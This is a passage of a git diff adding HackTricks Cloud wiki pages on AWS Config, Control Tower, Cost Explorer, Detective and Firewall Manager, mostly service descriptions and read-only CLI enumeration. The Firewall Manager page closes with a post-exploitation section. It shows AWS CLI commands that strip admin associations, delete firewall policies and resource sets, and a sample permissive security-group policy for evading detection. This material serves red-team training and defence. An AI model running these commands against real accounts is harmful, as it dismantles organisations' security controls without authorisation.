+{% endhint %}
+
+## AWS Config
+
+AWS Config **capture resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI. This service is **region specific**.
+
+A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too.
+
+* **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource.
+* **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance
+* **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in.
+* **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information.
+* **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created.
+
+**Configuration History**: It's possible to obtain the configuration history of resources thanks to the configurations items. A configuration history is delivered every 6 hours and contains all CI's for a particular resource type.
+
+**Configuration Streams**: Configuration items are sent to an SNS Topic to enable analysis of the data.
+
+**Configuration Snapshots**: Configuration items are used to create a point in time snapshot of all supported resources.
+
+**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access for this service principle, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account.
+
+### Functioning
+
+* When make changes, for example to security group or bucket access control list —> fire off as an Event picked up by AWS Config
+* Stores everything in S3 bucket
+* Depending on the setup, as soon as something changes it could trigger a lambda function OR schedule lambda function to periodically look through the AWS Config settings
+* Lambda feeds back to Config
+* If rule has been broken, Config fires up an SNS
+
+![](<../../../../.gitbook/assets/image (126).png>)
+
+### Config Rules
+
+Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\
+AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted.
+
+* **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist.
+* **Custom rules**: You can create your own rules to check specific customconfigurations.
+
+Limit of 50 config rules per region before you need to contact AWS for an increase.\
+Non compliant results are NOT deleted.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
new file mode 100644
index 0000000000..203439dda8
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
@@ -0,0 +1,72 @@
+# AWS - Control Tower Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Control Tower
+
+{% hint style="info" %}
+In summary, Control Tower is a service that allows to define policies for all your accounts inside your org. So instead of managing each of the you can set policies from COntrol Tower that will be applied on them.
+{% endhint %}
+
+AWS Control Tower is a **service provided by Amazon Web Services (AWS)** that enables organizations to set up and govern a secure, compliant, multi-account environment in AWS.
+
+AWS Control Tower provides a **pre-defined set of best-practice blueprints** that can be customized to meet specific **organizational requirements**. These blueprints include pre-configured AWS services and features, such as AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, and AWS Service Catalog.
+
+With AWS Control Tower, administrators can quickly set up a **multi-account environment that meets organizational requirements**, such as **security** and compliance. The service provides a central dashboard to view and manage accounts and resources, and it also automates the provisioning of accounts, services, and policies.
+
+In addition, AWS Control Tower provides guardrails, which are a set of pre-configured policies that ensure the environment remains compliant with organizational requirements. These policies can be customized to meet specific needs.
+
+Overall, AWS Control Tower simplifies the process of setting up and managing a secure, compliant, multi-account environment in AWS, making it easier for organizations to focus on their core business objectives.
+
+### Enumeration
+
+For enumerating controltower controls, you first need to **have enumerated the org**:
+
+{% content-ref url="../aws-organizations-enum.md" %}
+[aws-organizations-enum.md](../aws-organizations-enum.md)
+{% endcontent-ref %}
+
+{% code overflow="wrap" %}
+```bash
+# Get controls applied in an account
+aws controltower list-enabled-controls --target-identifier arn:aws:organizations::<acc_id>:ou/<ou-id>
+```
+{% endcode %}
+
+{% hint style="warning" %}
+Control Tower can also use **Account factory** to execute **CloudFormation templates** in **accounts and run services** (privesc, post-exploitation...) in those accounts
+{% endhint %}
+
+### Post Exploitation & Persistence
+
+{% content-ref url="../../aws-post-exploitation/aws-control-tower-post-exploitation.md" %}
+[aws-control-tower-post-exploitation.md](../../aws-post-exploitation/aws-control-tower-post-exploitation.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md
new file mode 100644
index 0000000000..588e24ab14
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md
@@ -0,0 +1,41 @@
+# AWS - Cost Explorer Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cost Explorer and Anomaly detection
+
+This allows you to check **how are you expending money in AWS services** and help you **detecting anomalies**.\
+Moreover, you can configure an anomaly detection so AWS will warn you when some a**nomaly in costs is found**.
+
+### Budgets
+
+Budgets help to **manage costs and usage**. You can get **alerted when a threshold is reached**.\
+Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?).
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md
new file mode 100644
index 0000000000..35ff808ba5
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md
@@ -0,0 +1,42 @@
+# AWS - Detective Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Detective
+
+**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations.
+
+The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause.
+
+## References
+
+* [https://aws.amazon.com/detective/](https://aws.amazon.com/detective/)
+* [https://cloudsecdocs.com/aws/services/logging/other/#detective](https://cloudsecdocs.com/aws/services/logging/other/#detective)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md
new file mode 100644
index 0000000000..8c2d01c882
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md
@@ -0,0 +1,330 @@
+# AWS - Firewall Manager Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Firewall Manager
+
+**AWS Firewall Manager** streamlines the management and maintenance of **AWS WAF, AWS Shield Advanced, Amazon VPC security groups and Network Access Control Lists (ACLs), and AWS Network Firewall, AWS Route 53 Resolver DNS Firewall and third-party firewalls** across multiple accounts and resources. It enables you to configure your firewall rules, Shield Advanced protections, VPC security groups, and Network Firewall settings just once, with the service **automatically enforcing these rules and protections across your accounts and resources**, including newly added ones.
+
+The service offers the capability to **group and safeguard specific resources together**, like those sharing a common tag or all your CloudFront distributions. A significant advantage of Firewall Manager is its ability to **automatically extend protection to newly added resources** in your account.
+
+A **rule group** (a collection of WAF rules) can be incorporated into an AWS Firewall Manager Policy, which is then linked to specific AWS resources such as CloudFront distributions or application load balancers.
+
+AWS Firewall Manager provides **managed application and protocol lists** to simplify the configuration and management of security group policies. These lists allow you to define the protocols and applications permitted or denied by your policies. There are two types of managed lists:
+
+* **Firewall Manager managed lists**: These lists include **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Protocols-Allowed** and **FMS-Default-Protocols-Allowed**. They are managed by Firewall Manager and include commonly used applications and protocols that should be allowed or denied to the general public. It is not possible to edit or delete them, however, you can choose its version.
+* **Custom managed lists**: You manage these lists yourself. You can create custom application and protocol lists tailored to your organization's needs. Unlike Firewall Manager managed lists, these lists do not have versions, but you have full control over custom lists, allowing you to create, edit, and delete them as required.
+
+It's important to note that **Firewall Manager policies permit only "Block" or "Count" actions** for a rule group, without an "Allow" option.
+
+### Prerequisites
+
+The following prerequisite steps must be completed before proceeding to configure Firewall Manager to begin protecting your organization's resources effectively. These steps provide the foundational setup required for Firewall Manager to enforce security policies and ensure compliance across your AWS environment:
+
+1. **Join and configure AWS Organizations:** Ensure your AWS account is part of the AWS Organizations organization where the AWS Firewall Manager policies are planned to be implanted. This allows for centralized management of resources and policies across multiple AWS accounts within the organization.
+2. **Create an AWS Firewall Manager Default Administrator Account:** Establish a default administrator account specifically for managing Firewall Manager security policies. This account will be responsible for configuring and enforcing security policies across the organization. Just the management account of the organization is able to create Firewall Manager default administrator accounts.
+3. **Enable AWS Config:** Activate AWS Config to provide Firewall Manager with the necessary configuration data and insights required to effectively enforce security policies. AWS Config helps analyze, audit, monitor and audit resource configurations and changes, facilitating better security management.
+4. **For Third-Party Policies, Subscribe in the AWS Marketplace and Configure Third-Party Settings:** If you plan to utilize third-party firewall policies, subscribe to them in the AWS Marketplace and configure the necessary settings. This step ensures that Firewall Manager can integrate and enforce policies from trusted third-party vendors.
+5. **For Network Firewall and DNS Firewall Policies, enable resource sharing:** Enable resource sharing specifically for Network Firewall and DNS Firewall policies. This allows Firewall Manager to apply firewall protections to your organization's VPCs and DNS resolution, enhancing network security.
+6. **To use AWS Firewall Manager in Regions that are disabled by default:** If you intend to use Firewall Manager in AWS regions that are disabled by default, ensure that you take the necessary steps to enable its functionality in those regions. This ensures consistent security enforcement across all regions where your organization operates.
+
+For more information, check: [Getting started with AWS Firewall Manager AWS WAF policies](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-fms.html).
+
+### Types of protection policies
+
+AWS Firewall Manager manages several types of policies to enforce security controls across different aspects of your organization's infrastructure:
+
+1. **AWS WAF Policy:** This policy type supports both AWS WAF and AWS WAF Classic. You can define which resources are protected by the policy. For AWS WAF policies, you can specify sets of rule groups to run first and last in the web ACL. Additionally, account owners can add rules and rule groups to run in between these sets.
+2. **Shield Advanced Policy:** This policy applies Shield Advanced protections across your organization for specified resource types. It helps safeguard against DDoS attacks and other threats.
+3. **Amazon VPC Security Group Policy:** With this policy, you can manage security groups used throughout your organization, enforcing a baseline set of rules across your AWS environment to control network access.
+4. **Amazon VPC Network Access Control List (ACL) Policy:** This policy type gives you control over network ACLs used in your organization, allowing you to enforce a baseline set of network ACLs across your AWS environment.
+5. **Network Firewall Policy:** This policy applies AWS Network Firewall protection to your organization's VPCs, enhancing network security by filtering traffic based on predefined rules.
+6. **Amazon Route 53 Resolver DNS Firewall Policy:** This policy applies DNS Firewall protections to your organization's VPCs, helping to block malicious domain resolution attempts and enforce security policies for DNS traffic.
+7. **Third-Party Firewall Policy:** This policy type applies protections from third-party firewalls, which are available by subscription through the AWS Marketplace console. It allows you to integrate additional security measures from trusted vendors into your AWS environment.
+   1. **Palo Alto Networks Cloud NGFW Policy:** This policy applies Palo Alto Networks Cloud Next Generation Firewall (NGFW) protections and rulestacks to your organization's VPCs, providing advanced threat prevention and application-level security controls.
+   2. **Fortigate Cloud Native Firewall (CNF) as a Service Policy:** This policy applies Fortigate Cloud Native Firewall (CNF) as a Service protections, offering industry-leading threat prevention, web application firewall (WAF), and API protection tailored for cloud infrastructures.
+
+### Administrator accounts
+
+AWS Firewall Manager offers flexibility in managing firewall resources within your organization through its administrative scope and two types of administrator accounts.
+
+**Administrative scope defines the resources that a Firewall Manager administrator can manage**. After an AWS Organizations management account onboards an organization to Firewall Manager, it can create additional administrators with different administrative scopes. These scopes can include:
+
+* Accounts or organizational units (OUs) that the administrator can apply policies to.
+* Regions where the administrator can perform actions.
+* Firewall Manager policy types that the administrator can manage.
+
+Administrative scope can be either **full or restricted**. Full scope grants the administrator access to **all specified resource types, regions, and policy types**. In contrast, **restricted scope provides administrative permission to only a subset of resources, regions, or policy types**. It's advisable to grant administrators only the permissions they need to fulfill their roles effectively. You can apply any combination of these administrative scope conditions to an administrator, ensuring adherence to the principle of least privilege.
+
+There are two distinct types of administrator accounts, each serving specific roles and responsibilities:
+
+* **Default Administrator:**
+  * The default administrator account is created by the AWS Organizations organization's management account during the onboarding process to Firewall Manager.
+  * This account has the capability to manage third-party firewalls and possesses full administrative scope.
+  * It serves as the primary administrator account for Firewall Manager, responsible for configuring and enforcing security policies across the organization.
+  * While the default administrator has full access to all resource types and administrative functionalities, it operates at the same peer level as other administrators if multiple administrators are utilized within the organization.
+* **Firewall Manager Administrators:**
+  * These administrators can manage resources within the scope designated by the AWS Organizations management account, as defined by the administrative scope configuration.
+  * Firewall Manager administrators are created to fulfill specific roles within the organization, allowing for delegation of responsibilities while maintaining security and compliance standards.
+  * Upon creation, Firewall Manager checks with AWS Organizations to determine if the account is already a delegated administrator. If not, Firewall Manager calls Organizations to designate the account as a delegated administrator for Firewall Manager.
+
+Managing these administrator accounts involves creating them within Firewall Manager and defining their administrative scopes according to the organization's security requirements and the principle of least privilege. By assigning appropriate administrative roles, organizations can ensure effective security management while maintaining granular control over access to sensitive resources.
+
+It is important to highlight that **only one account within an organization can serve as the Firewall Manager default administrator**, adhering to the principle of "**first in, last out**". To designate a new default administrator, a series of steps must be followed:
+
+* First, each Firewall Administrator administrator account must revoke their own account.
+* Then, the existing default administrator can revoke their own account, effectively offboarding the organization from Firewall Manager. This process results in the deletion of all Firewall Manager policies created by the revoked account.
+* To conclude, the AWS Organizations management account must designate the Firewall Manager dafault administrator.
+
+## Enumeration
+
+```
+# Users/Administrators
+
+## Get the AWS Organizations account that is associated with AWS Firewall Manager as the AWS Firewall Manager default administrator
+aws fms get-admin-account
+
+## List of Firewall Manager administrators within the organization
+aws fms list-admin-accounts-for-organization # ReadOnlyAccess policy is not enough for this
+
+## Return a list of the member accounts in the FM administrator's AWS organization
+aws fms list-member-accounts # Only a Firewall Manager administrator or the Organization's management account can make this request
+
+## List the accounts that are managing the specified AWS Organizations member account
+aws fms list-admins-managing-account # ReadOnlyAccess policy is not enough for this
+
+# Resources
+
+## Get the resources that a Firewall Manager administrator can manage
+aws fms get-admin-scope --admin-account <value> # ReadOnlyAccess policy is not enough for this
+
+## Returns the summary of the resource sets used
+aws fms list-resource-sets # ReadOnlyAccess policy is not enough for this
+
+## Get information about a specific resource set
+aws fms get-resource-set --identifier <value>  # ReadOnlyAccess policy is not enough for this
+
+## Retrieve the list of tags for a given resource
+aws fms list-tags-for-resource --resource-arn <value>
+
+## List of the resources in the AWS Organization's accounts that are available to be associated with a FM resource set. Only one account is supported per request. 
+aws fms list-compliance-status --member-account-ids <value> --resource-type <value> # ReadOnlyAccess policy is not enough for this
+
+## List the resources that are currently associated to a resource set
+aws fms list-resource-set-resources --identifier <value> # ReadOnlyAccess policy is not enough for this
+
+# Policies
+
+## Returns the list of policies
+aws fms list-policies
+
+## Get information about the specified AWS Firewall Manager policy
+aws fms get-policy --policy-id <value>
+
+## List all of the third-party firewall policies that are associated with the third-party firewall administrator's account
+aws fms list-third-party-firewall-firewall-policies --third-party-firewall <PALO_ALTO_NETWORKS_CLOUD_NGFW|FORTIGATE_CLOUD_NATIVE_FIREWALL> # ReadOnlyAccess policy is not enough for this
+
+# AppsList
+
+## Return a list of apps list
+aws fms list-apps-lists --max-results [1-100]
+
+## Get information about the specified AWS Firewall Manager applications list
+aws fms get-apps-list --list-id <value>
+
+# Protocols
+
+## Get the details of the Firewall Manager protocols list.
+aws fms list-protocols-lists
+
+## Get information about the specified AWS Firewall Manager Protocols list
+aws fms get-protocols-list --list-id <value>
+
+# Compliance
+
+## Return a summary of which member accounts are protected by the specified policy
+aws fms list-compliance-status --policy-id <policy-id>
+
+## Get detailed compliance information about the specified member account (resources that are in and out of compliance with the specified policy)
+aws fms get-compliance-detail --policy-id <value> --member-account <value>
+
+# Other useful info
+
+## Get information about the SNS topic that is used to record AWS Firewall Manager SNS logs (if any)
+aws fms get-notification-channel
+
+## Get policy-level attack summary information in the event of a potential DDoS attack
+aws fms get-protection-status --policy-id <value> # Just for Shield Advanced policy
+
+## Get the onboarding status of a Firewall Manager admin account to third-party firewall vendor tenant.
+aws fms get-third-party-firewall-association-status --third-party-firewall <PALO_ALTO_NETWORKS_CLOUD_NGFW|FORTIGATE_CLOUD_NATIVE_FIREWALL> # ReadOnlyAccess policy is not enough for this
+
+## Get violations' details for a resource based on the specified AWS Firewall Manager policy and AWS account.
+aws fms get-violation-details --policy-id <value> --member-account <value> --resource-id <value> --resource-type <value>
+```
+
+## Post Exploitation / Bypass Detection
+
+### `organizations:DescribeOrganization` & (`fms:AssociateAdminAccount`, `fms:DisassociateAdminAccount`, `fms:PutAdminAccount`)
+
+An attacker with the **`fms:AssociateAdminAccount`** permission would be able to set the Firewall Manager default administrator account. With the **`fms:PutAdminAccount`** permission, an attacker would be able to create or updatea Firewall Manager administrator account and with the **`fms:DisassociateAdminAccount`** permission, a potential attacker could remove the current Firewall Manager administrator account association.
+
+* The disassociation of the **Firewall Manager default administrator follows the first-in-last-out policy**. All the Firewall Manager administrators must disassociate before the Firewall Manager default administrator can disassociate the account.
+* In order to create a Firewall Manager administrator by **PutAdminAccount**, the account must belong to the organization that was previously onboarded to Firewall Manager using **AssociateAdminAccount**.
+* The creation of a Firewall Manager administrator account can only be done by the organization's management account.
+
+```bash
+aws fms associate-admin-account --admin-account <value>
+aws fms disassociate-admin-account
+aws fms put-admin-account --admin-account <value>
+```
+
+**Potential Impact:** Loss of centralized management, policy evasion, compliance violations, and disruption of security controls within the environment.
+
+### `fms:PutPolicy`, `fms:DeletePolicy`
+
+An attacker with the **`fms:PutPolicy`**, **`fms:DeletePolicy`** permissions would be able to create, modify or permanently delete an AWS Firewall Manager policy.
+
+```bash
+aws fms put-policy --policy <value> | --cli-input-json file://<policy.json> [--tag-list <value>]
+aws fms delete-policy --policy-id <value> [--delete-all-policy-resources | --no-delete-all-policy-resources]
+```
+
+An example of permisive policy through permisive security group, in order to bypass the detection, could be the following one:
+
+```json
+{
+    "Policy": {
+        "PolicyName": "permisive_policy",
+        "SecurityServicePolicyData": {
+            "Type": "SECURITY_GROUPS_COMMON",
+            "ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"<permisive_security_group_id>\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}"
+        },
+        "ResourceTypeList": ["AWS::EC2::Instance", "AWS::EC2::NetworkInterface", "AWS::EC2::SecurityGroup", "AWS::ElasticLoadBalancingV2::LoadBalancer", "AWS::ElasticLoadBalancing::LoadBalancer"],
+        "ResourceType": "AWS::EC2::SecurityGroup",
+        "ExcludeResourceTags": false,
+        "ResourceTags": [],
+        "RemediationEnabled": true
+    },
+    "TagList": []
+}
+```
+
+**Potential Impact:** Dismantling of security controls, policy evasion, compliance violations, operational disruptions, and potential data breaches within the environment.
+
+### `fms:BatchAssociateResource`, `fms:BatchDisassociateResource`, `fms:PutResourceSet`, `fms:DeleteResourceSet`
+
+An attacker with the **`fms:BatchAssociateResource`** and **`fms:BatchDisassociateResource`** permissions would be able to associate or disassociate resources from a Firewall Manager resource set respectively. In addition, the **`fms:PutResourceSet`** and **`fms:DeleteResourceSet`** permissions would allow an attacker to create, modify or delete these resource sets from AWS Firewall Manager.
+
+```bash
+# Associate/Disassociate resources from a resource set
+aws fms batch-associate-resource --resource-set-identifier <value> --items <value>
